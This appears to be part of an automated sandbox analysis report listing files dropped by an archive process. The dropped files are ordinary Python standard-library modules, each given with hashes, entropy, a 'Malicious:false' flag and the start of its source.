                                                                                                                                                                                      SSDEEP:192:gPOPzegOJGFvwyWWF0/zE0JeCQ29efwBlp7bv7ab4/g:gPOPzevyqzEf2AwfW4I
                                                                                                                                                                                      MD5:7769EC6B9C5D9BDCB77C0B8C0DD455B7
                                                                                                                                                                                      SHA1:133C707D9D0A624B0FF3053ABC2E242B19DD4597
                                                                                                                                                                                      SHA-256:2C6B8B3497379DCA72B20396651DC66E19105E0068617E2278FD4041CE9E1B5E
                                                                                                                                                                                      SHA-512:6A6626FB1314D17DA1CE1C1E60C45C07B1914C1B3503BB103965024F72D290FBCF6DE9A0664807EAA77458F98B84677D451027EE0E1B95817C9AC79CDA2D2F21
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for numbers, according to PEP 3141.....TODO: Fill out more detailed documentation on the operators."""....from abc import ABCMeta, abstractmethod....__all__ = ["Number", "Complex", "Real", "Rational", "Integral"]....class Number(metaclass=ABCMeta):.. """All numbers inherit from this class..... If you just want to check if an argument x is a number, without.. caring what kind, use isinstance(x, Number)... """.. __slots__ = ().... # Concrete numeric types must provide their own hash implementation.. __hash__ = None......## Notes on Decimal..## ----------------..## Decimal has all of the methods specified by the Real abc, but it should..## not be registered as a Real because decimals do not interoperate with..## binary floats (i.e. Decimal('3.14') + 2.71828 is undefined). But,..## abstract reals are expected to interoperate (i.e. R1
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6118
                                                                                                                                                                                      Entropy (8bit):5.48724844773523
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rAgeOM9nKfM157diUwhKV66jW+SYtpabTB3fYSn3T4yU879+L:kgFMs+Z5R66/SYSbTBPYUD0K9+L
                                                                                                                                                                                      MD5:456CFAE710FCF7EE289077D31D81C422
                                                                                                                                                                                      SHA1:CAAF1F38034028E6A82532CC87ADBE2AE87D3D11
                                                                                                                                                                                      SHA-256:F352006FE369806030FB7A3BD2EF770BE711AEA0C0C4B6A4D983839BF20910E7
                                                                                                                                                                                      SHA-512:3F426FCD7FD2B8AB74CAA5F6DE4E9A10552FE9A5180D09E69E95BA90C13912148B6517222BC9E5C669F524F8532E7EFD4A214F73AD73F2B33EA350D8E38A9ED7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:.."""..opcode module - potentially shared between dis and other modules which..operate on bytecodes (e.g. peephole optimizers)..."""....__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",.. "haslocal", "hascompare", "hasfree", "opname", "opmap",.. "HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]....# It's a chicken-and-egg I'm afraid:..# We're imported before _opcode's made...# With exception unheeded..# (stack_effect is not needed)..# Both our chickens and eggs are allayed...# --Larry Hastings, 2013/11/23....try:.. from _opcode import stack_effect.. __all__.append('stack_effect')..except ImportError:.. pass....cmp_op = ('<', '<=', '==', '!=', '>', '>=')....hasconst = []..hasname = []..hasjrel = []..hasjabs = []..haslocal = []..hascompare = []..hasfree = []..hasnargs = [] # unused....opmap = {}..opname = ['<%r>' % (op,) for op in range(256)]....def def_op(name, op):.. opname[op] = name.. opmap[name] = op....def name_op(name, op):.. de
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11211
                                                                                                                                                                                      Entropy (8bit):4.573391166266157
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oFe9H1gEi2lSRhgnxHKg4qa9lcDxtZifr6Rm6Qatv1S9gEKQbi5rVKVOOcLRJpht:42hwCEKQbi5zoy
                                                                                                                                                                                      MD5:5CE128B0B666D733F0BE7DFF2DA87F7C
                                                                                                                                                                                      SHA1:B73F3EA48ADA4ECA01FBED4A2D22076AD03C1F74
                                                                                                                                                                                      SHA-256:4B14013B84FFE4BE36FC3A4B847006BA1182596612D2A2AB42A6E94FF990B462
                                                                                                                                                                                      SHA-512:557557F4BF9A6F238340596AA84F079318F96C44E26804A3083A6359C36BDB6CEF5D5A2D5A698202D36BF6B9C7D0D7625B4E2B72B0A4582A78569E104F9F755A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Operator Interface....This module exports a set of functions corresponding to the intrinsic..operators of Python. For example, operator.add(x, y) is equivalent..to the expression x+y. The function names are those used for special..methods; variants without leading and trailing '__' are also provided..for convenience.....This is the pure Python implementation of the module..."""....__all__ = ['abs', 'add', 'and_', 'attrgetter', 'concat', 'contains', 'countOf',.. 'delitem', 'eq', 'floordiv', 'ge', 'getitem', 'gt', 'iadd', 'iand',.. 'iconcat', 'ifloordiv', 'ilshift', 'imatmul', 'imod', 'imul',.. 'index', 'indexOf', 'inv', 'invert', 'ior', 'ipow', 'irshift',.. 'is_', 'is_not', 'isub', 'itemgetter', 'itruediv', 'ixor', 'le',.. 'length_hint', 'lshift', 'lt', 'matmul', 'methodcaller', 'mod',.. 'mul', 'ne', 'neg', 'not_', 'or_', 'pos', 'pow', 'rshift',.. 'setitem', 'sub', 'truediv', 'truth', 'xor']....from builtins im
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):62050
                                                                                                                                                                                      Entropy (8bit):4.459564941363674
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:yG/pFySCc5myk6vLS9021IwMniNxQ5xqSvl:yG/HyfN6o965xlvl
                                                                                                                                                                                      MD5:847CC0387E4999C3B43BCE251DF2DC18
                                                                                                                                                                                      SHA1:E7F6ED46A782655CBF381EC06EA05DEBF5506F4C
                                                                                                                                                                                      SHA-256:5C46C1CCCC32E7778E3AE4F7018D4D713AAA1DBD13210506472C2E6DEE2D4F73
                                                                                                                                                                                      SHA-512:9BFBF93216DAA4628F3D9D248536B26953F029108D928719C1DB5882EDED5BAC5B715FD5E10FBFD43E0EE948CC1730C0917186F23FD8E5ECBC82C8A7755C1360
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A powerful, extensible, and easy-to-use option parser.....By Greg Ward <gward@python.net>....Originally distributed as Optik.....For support, use the optik-users@lists.sourceforge.net mailing list..(http://lists.sourceforge.net/lists/listinfo/optik-users).....Simple usage example:.... from optparse import OptionParser.... parser = OptionParser().. parser.add_option("-f", "--file", dest="filename",.. help="write report to FILE", metavar="FILE").. parser.add_option("-q", "--quiet",.. action="store_false", dest="verbose", default=True,.. help="don't print status messages to stdout").... (options, args) = parser.parse_args().."""....__version__ = "1.5.3"....__all__ = ['Option',.. 'make_option',.. 'SUPPRESS_HELP',.. 'SUPPRESS_USAGE',.. 'Values',.. 'OptionContainer',.. 'OptionGroup',.. 'OptionParser',.. 'HelpFormatter',.. 'Indented
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):40680
                                                                                                                                                                                      Entropy (8bit):4.577808445819657
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:FTfWsLgH74t1vL5VPkBSP53n4pIiwCepY82y76EM6ED6En6En63686A6xMt1iM/:FTWc1tpaIiwl7
                                                                                                                                                                                      MD5:8180E937086A657D6B15418FF4215C35
                                                                                                                                                                                      SHA1:232E8F00EED28BE655704ECCDAB3E84D66CC8F53
                                                                                                                                                                                      SHA-256:521F714DC038E0FAA53E7DE3DBCCAE0631D96A4D2D655F88B970BD8CF29EC750
                                                                                                                                                                                      SHA-512:A682A8F878791510A27DE3A0E407889D3F37855FB699320B4355B48CB23DE69B89DADD77FDCCA33EF8E5855278E584B8E7947B626D6623C27521D87EAE5A30D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""OS routines for NT or Posix depending on what system we're on.....This exports:.. - all functions from posix or nt, e.g. unlink, stat, etc... - os.path is either posixpath or ntpath.. - os.name is either 'posix' or 'nt'.. - os.curdir is a string representing the current directory (always '.').. - os.pardir is a string representing the parent directory (always '..').. - os.sep is the (or a most common) pathname separator ('/' or '\\').. - os.extsep is the extension separator (always '.').. - os.altsep is the alternate pathname separator (None or '/').. - os.pathsep is the component separator used in $PATH etc.. - os.linesep is the line separator in text files ('\r' or '\n' or '\r\n').. - os.defpath is the default search path for executables.. - os.devnull is the file path of the null device ('/dev/null', etc.)....Programs that import and use 'os' stand a better chance of being..portable between different platforms. Of course, they must then..only use functions that are
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51036
                                                                                                                                                                                      Entropy (8bit):4.4519233536876275
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:luuewaM+l9hHaktD7QBq2mM1E0lpijUSiwHYBKDwx:luuew4FH3D7QBne0lQjUSiwHzwx
                                                                                                                                                                                      MD5:296F3A27E6D3758364E1F4925A8AC32E
                                                                                                                                                                                      SHA1:A53DC770A17E23BB66692A44ECD804AA7A3947EF
                                                                                                                                                                                      SHA-256:7500FE2B8C9BE491C44E5F1DBE4D4E3139037305E0465DF69F08E05E74C2DC94
                                                                                                                                                                                      SHA-512:4A13256676D59D8DBDF2353309E5699AFC88B4976F2FC3D710D9BDF132FB2216D3B94B52476F4C3D2D856405A66C3C192853812CBA43B851C034C0215D6A1918
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import fnmatch..import functools..import io..import ntpath..import os..import posixpath..import re..import sys..import warnings..from _collections_abc import Sequence..from errno import EINVAL, ENOENT, ENOTDIR, EBADF, ELOOP..from operator import attrgetter..from stat import S_ISDIR, S_ISLNK, S_ISREG, S_ISSOCK, S_ISBLK, S_ISCHR, S_ISFIFO..from urllib.parse import quote_from_bytes as urlquote_from_bytes......__all__ = [.. "PurePath", "PurePosixPath", "PureWindowsPath",.. "Path", "PosixPath", "WindowsPath",.. ]....#..# Internals..#...._WINERROR_NOT_READY = 21 # drive exists but is not accessible.._WINERROR_INVALID_NAME = 123 # fix for bpo-35306.._WINERROR_CANT_RESOLVE_FILENAME = 1921 # broken symlink pointing to itself....# EBADF - guard against macOS `stat` throwing EBADF.._IGNORED_ERROS = (ENOENT, ENOTDIR, EBADF, ELOOP)...._IGNORED_WINERRORS = (.. _WINERROR_NOT_READY,.. _WINERROR_INVALID_NAME,.. _WINERROR_CANT_RESOLVE_FILENAME)....def _ignore_error(exception):..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):64975
                                                                                                                                                                                      Entropy (8bit):4.3364206659285
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:X/9nCVLsvNyYaNGNxJe5gMhjpGeNgxF2F6e1QliUcWQ36ApxGqfghG9G39pM9zzd:XVnCeI9GeNgxYR+Tmzzd
                                                                                                                                                                                      MD5:46404C083B59F6091A6C037FCCD9AA7E
                                                                                                                                                                                      SHA1:D1DA36307E4222CAA522ED76BA55281FB8E286EE
                                                                                                                                                                                      SHA-256:084615A596B417178C36DA179FE5F106079A184D7F10206137CA1D89B7446D91
                                                                                                                                                                                      SHA-512:455E2FF1AA733AD5CB4A9AB9A5B512C4AFED61EE337084ADBDEF5A45FAA3C432AA01CBF4937E1D98EB1FF80A402393E3085906B33D9C83E582F9A7F4E14922B1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""..The Python Debugger Pdb..=======================....To use the debugger in its simplest form:.... >>> import pdb.. >>> pdb.run('<a statement>')....The debugger's prompt is '(Pdb) '. This will stop in the first..function call in <a statement>.....Alternatively, if a statement terminated with an unhandled exception,..you can use pdb's post-mortem facility to inspect the contents of the..traceback:.... >>> <a statement>.. <exception traceback>.. >>> import pdb.. >>> pdb.pm()....The commands recognized by the debugger are listed in the next..section. Most can be abbreviated as indicated; e.g., h(elp) means..that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',..nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in..square brackets. Alternatives in the command syntax are separated..by a vertical bar (|).....A blank line repeats the previous command literally, except for..'list', where
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66769
                                                                                                                                                                                      Entropy (8bit):4.582827313661204
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:f/It2JPYZKT0egjRsk4jOEFvVNVdA2Kn5YIqEIKyNxzXhln:f/lVT0eg1P4jBvVNfA26SBN1H
                                                                                                                                                                                      MD5:91424AE0A9D1B1AB8074044C19813A21
                                                                                                                                                                                      SHA1:1EE0E43AE3F897734095B2A80D2055A96F84C4EB
                                                                                                                                                                                      SHA-256:6799D6E62B61392A6625297FB02CDE322A64713F4050F9171835D20647F430F9
                                                                                                                                                                                      SHA-512:A76533B62B42816B980E5BAA87F46AF3EF8E944BAC0B6FC5697F35F241FD1F749BBD0801A392F94F4331FF1ED89583313903FBF558535E70CB865921B2BB2505
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Create portable serialized representations of Python objects.....See module copyreg for a mechanism for registering custom picklers...See module pickletools source for extensive comments.....Classes:.... Pickler.. Unpickler....Functions:.... dump(object, file).. dumps(object) -> string.. load(file) -> object.. loads(bytes) -> object....Misc variables:.... __version__.. format_version.. compatible_formats...."""....from types import FunctionType..from copyreg import dispatch_table..from copyreg import _extension_registry, _inverted_registry, _extension_cache..from itertools import islice..from functools import partial..import sys..from sys import maxsize..from struct import pack, unpack..import re..import io..import codecs..import _compat_pickle....__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",.. "Unpickler", "dump", "dumps", "load", "loads"]....try:.. from _pickle import PickleBuffer.. __all__.append("PickleBuffer"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):96376
                                                                                                                                                                                      Entropy (8bit):4.70927586282489
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:2eNm/Sv/H0mLaWZ5PZFACL/Vx3yRF6lceF0nL13:2eNmyceE3
                                                                                                                                                                                      MD5:BF481644934BC14B72C7A9CFAF9C0A2E
                                                                                                                                                                                      SHA1:A411AE3DD3AE3DF53B214DB31FC13AB7233554EC
                                                                                                                                                                                      SHA-256:D9BB042BC26DAD7A99D1A1ADB3ACEE7C3E93D8B6F5068B55D9B55B6FF3CCD620
                                                                                                                                                                                      SHA-512:C4C77D5396FA79D671607F8BEFE5ED15C1FCEC1BC306653380608E611383C38E96FEBD07C176308D40A553FDE86EBC1150CD7E2D2586D0067BF28E1343A45718
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:'''"Executable documentation" for the pickle module.....Extensive comments about the pickle protocols and pickle-machine opcodes..can be found here. Some functions meant for external use:....genops(pickle).. Generate all the opcodes in a pickle, as (opcode, arg, position) triples.....dis(pickle, out=None, memo=None, indentlevel=4).. Print a symbolic disassembly of a pickle...'''....import codecs..import io..import pickle..import re..import sys....__all__ = ['dis', 'genops', 'optimize']....bytes_types = pickle.bytes_types....# Other ideas:..#..# - A pickle verifier: read a pickle and check it exhaustively for..# well-formedness. dis() does a lot of this already...#..# - A protocol identifier: examine a pickle and return its protocol number..# (== the highest .proto attr value among all the opcodes in the pickle)...# dis() already prints this info at the end...#..# - A pickle optimizer: for example, tuple-building code is sometimes more..# elaborate than necessary, cater
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9161
                                                                                                                                                                                      Entropy (8bit):4.618151645678958
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dNkrAzSFOVVuP49BSMIt57PMd3heQim6VmGJbIDhP7W8O6xVSjfvEoebDAMnV/mR:dNkrAzSYVVuE+Hxm0RIP5rhat8Mv
                                                                                                                                                                                      MD5:A812BEB990E7B1DA92F3F62C529CBE61
                                                                                                                                                                                      SHA1:EFDAFCFC9C646CEF34E86A77912D2F8BD42F1486
                                                                                                                                                                                      SHA-256:2C1DEC7CF7DE19B9BE20982F5EA36B3DD0601C1610AF4F07E8F8D4F987CBFCAD
                                                                                                                                                                                      SHA-512:C69F37CF28E0246C50CE85F03B2921AA3F4EAC9291E01C91C1CD493C01774377504E147F731CAADC07ECCB869DB4F331DA13AD814AAD50E37579E3A0F14D13F0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Conversion pipeline templates.....The problem:..------------....Suppose you have some data that you want to convert to another format,..such as from GIF image format to PPM image format. Maybe the..conversion involves several steps (e.g. piping it through compress or..uuencode). Some of the conversion steps may require that their input..is a disk file, others may be able to read standard input; similar for..their output. The input to the entire conversion may also be read..from a disk file or from an open file, and similar for its output.....The module lets you construct a pipeline template by sticking one or..more conversion steps together. It will take care of creating and..removing temporary files if they are necessary to hold intermediate..data. You can then use the template to do conversions from many..different sources to many different destinations. The temporary..file names used are different each time the template is used.....The templates are objects so you can creat
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25291
                                                                                                                                                                                      Entropy (8bit):4.42914607165026
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:ubpsSPckq/vGkbcgDeywNuTvly2aGqMuUtC+hjx0UtkGG1FIzN1MVhOsV:ubaSP8smkgBNjWz1Fht
                                                                                                                                                                                      MD5:1EEEC51079475A5A1337FC8C5DF7889F
                                                                                                                                                                                      SHA1:409FF02B159BF9941F723193FF52E1227B586022
                                                                                                                                                                                      SHA-256:1C97E98D400D61B3F894A1B014A1E1252EEC2F3D9A8468636A661208E4A7BD05
                                                                                                                                                                                      SHA-512:26DAAA7577241563D7321623942A04B1C55EAE3610214E9505525D47D5EEF2B20BF267C89ED7CB727293618FF00138ED9A53D166D95AFE2B75DF6D46C921C102
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities to support packages."""....from collections import namedtuple..from functools import singledispatch as simplegeneric..import importlib..import importlib.util..import importlib.machinery..import os..import os.path..import sys..from types import ModuleType..import warnings....__all__ = [.. 'get_importer', 'iter_importers', 'get_loader', 'find_loader',.. 'walk_packages', 'iter_modules', 'get_data',.. 'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',.. 'ModuleInfo',..]......ModuleInfo = namedtuple('ModuleInfo', 'module_finder name ispkg')..ModuleInfo.__doc__ = 'A namedtuple with minimal info about a module.'......def _get_spec(finder, name):.. """Return the finder-specific module spec.""".. # Works with legacy finders... try:.. find_spec = finder.find_spec.. except AttributeError:.. loader = finder.find_module(name).. if loader is None:.. return None.. return importlib.util.spec_from_loader(name, loader)..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):43336
                                                                                                                                                                                      Entropy (8bit):4.687857736895332
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:9bc2S92P0OLDrXVNZib4xEsA7GkJp+YafLlD/WG3Tu8HDSCsFwldmPNJOw+2/ln6:62BLDrob436p+VfLlDrS8HDSCsFwTSx6
                                                                                                                                                                                      MD5:F1AB2DC8B6A1B56DF2BA8F98224D0701
                                                                                                                                                                                      SHA1:E9E8C632C64D7E5C0083A05F3BE70ECC5FA6B39D
                                                                                                                                                                                      SHA-256:275B3D17D1F5EF4A0A7D3FCC7D5DBF72422A72CE234EB7C8A9D0D9975F6F70C3
                                                                                                                                                                                      SHA-512:12F82340F2584DFE296D7312CA3228530087CD16AE8FB5F6AB2C75BBAAAD6A56D1629A81981C41A0D33EF7870CAB5AEE752A2E415270E6F7147DCF9E64366E48
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python3....""" This module tries to retrieve as much platform-identifying data as.. possible. It makes this information available via function APIs..... If called from the command line, it prints the platform.. information concatenated as single string to stdout. The output.. format is useable as part of a filename....."""..# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>...# If you find problems, please submit bug reports/patches via the..# Python bug tracker (http://bugs.python.org) and assign them to "lemburg"...#..# Still needed:..# * support for MS-DOS (PythonDX ?)..# * support for Amiga and other still unsupported platforms running Python..# * support for additional Linux distributions..#..# Many thanks to all those who helped adding platform-specific..# checks (in no particular order):..#..# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,..# Jeff Bauer, Cliff Crawford, Ivan Van Lanin
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29263
                                                                                                                                                                                      Entropy (8bit):4.616853679109559
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:K4FnSsaOu3ywDNAotyQVGdYjzAX1i5vi2R2dLpv68LuSYGXlzBp1yD:bFnSsk3yw9//jzAX1i5vi2R27v68LuSi
                                                                                                                                                                                      MD5:DA68DE2038480FDFFA9BA88E0CD878F1
                                                                                                                                                                                      SHA1:A8182D084E4794564AFE39D6B9D532D28FF20545
                                                                                                                                                                                      SHA-256:934074D9CEABEC70207EDE26C9CEF10A7FFBA720CC9B1A4F40134DF4B702FD51
                                                                                                                                                                                      SHA-512:29F739DF8F5AF4865134458535ED26EBA9BEA10B944C3BB62ED5EF4900A632B385FB6A685898B9A2470E48AF468379C4A4DA5B554952A462E8F277F71015FA16
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""plistlib.py -- a tool to generate and parse MacOSX .plist files.....The property list (.plist) file format is a simple XML pickle supporting..basic object types, like dictionaries, lists, numbers and strings...Usually the top level object is a dictionary.....To write out a plist file, use the dump(value, file)..function. 'value' is the top level object, 'file' is..a (writable) file object.....To parse a plist from a file, use the load(file) function,..with a (readable) file object as the only argument. It..returns the top level object (again, usually a dictionary).....To work with plist data in bytes objects, you can use loads()..and dumps().....Values can be strings, integers, floats, booleans, tuples, lists,..dictionaries (but only with string keys), Data, bytes, bytearray, or..datetime.datetime objects.....Generate Plist example:.... import datetime.. import plistlib.... pl = dict(.. aString = "Doodah",.. aList = ["A", "B", 12, 32.1, [1, 2, 3]],.. a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15681
                                                                                                                                                                                      Entropy (8bit):4.545608549924057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:399df9uylT1ZUhRFeOS0DVipTnzr4ZCi2w:N9dUylTma0DVipDzUZCi2w
                                                                                                                                                                                      MD5:8827240702694AD5C2A064103157245C
                                                                                                                                                                                      SHA1:8596D00B1574A06C705A00503DCE496F1E905953
                                                                                                                                                                                      SHA-256:FCA47328C848D2517B797C303910F363CD118D4A57EAFC699EA9BD07E3555DA9
                                                                                                                                                                                      SHA-512:3A9C6E5911C26A9960F1676E449FC267AF9CFD5746B092804CFE43A11B1F68AD624B5AB72A559E759B2F10869D111DB8E58E567E43D0B5CA6B361826DFA475F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A POP3 client class.....Based on the J. Myers POP3 draft, Jan. 96.."""....# Author: David Ascher <david_ascher@brown.edu>..# [heavily stealing from nntplib.py]..# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]..# String method conversion and test jig improvements by ESR, February 2001...# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003....# Example (see the test function at the end of this file)....# Imports....import errno..import re..import socket..import sys....try:.. import ssl.. HAVE_SSL = True..except ImportError:.. HAVE_SSL = False....__all__ = ["POP3","error_proto"]....# Exception raised when an error or invalid response is received:....class error_proto(Exception): pass....# Standard Port..POP3_PORT = 110....# POP SSL PORT..POP3_SSL_PORT = 995....# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)..CR = b'\r'..LF = b'\n'..CRLF = CR+LF....# maximal line length when callin
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16792
                                                                                                                                                                                      Entropy (8bit):4.523436713727538
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:o1EBBFYOHeIlLGN2lzfQzfauq63pvTLhDNqbZLtHcpYtD:o1EBB3Lcauq6aZLGp0
                                                                                                                                                                                      MD5:83225ED90D2BCA83319A2A828EEDFD03
                                                                                                                                                                                      SHA1:E8C0C715FEE809981D7FDC1F204580422A27F610
                                                                                                                                                                                      SHA-256:089CA943FE970634B2D9171E19E34CABF2CF7A43D23BD8738A89F334BBD971D4
                                                                                                                                                                                      SHA-512:C8115208CC9E858816BFAF940C3728A2020A7E5794371E73596DF1A90B1A668A037BA2B5419A96685B375B0390E94C989E860F53D54F2556BE7F7369976D658F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Common operations on Posix pathnames.....Instead of importing this module directly, import os and refer to..this module as os.path. The "os.path" name is an alias for this..module on Posix systems; on other systems (e.g. Windows),..os.path provides the same operations in a manner specific to that..platform, and is an alias to another module (e.g. ntpath).....Some of this can actually be useful on non-Posix systems too, e.g...for manipulation of the pathname component of URLs..."""....# Strings representing various path-related bits and pieces...# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '/'..pathsep = ':'..defpath = '/bin:/usr/bin'..altsep = None..devnull = '/dev/null'....import os..import sys..import stat..import genericpath..from genericpath import *....__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25114
                                                                                                                                                                                      Entropy (8bit):4.322203919874031
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0zJwB8YxVSFKCbM7mDO9dcqaDmQnfxRW9VguPxWLgB:0zJwKY7CbVDgiTWVxW4
                                                                                                                                                                                      MD5:2DC4035AC114107D8B13E39958938960
                                                                                                                                                                                      SHA1:EF2565CAFCAD5FF6E795748DD913DA4A5ABD482D
                                                                                                                                                                                      SHA-256:0905D7CD070A291A506B1B2CC46DADC85007C2739D9BF2F1DCDE01A9C1679821
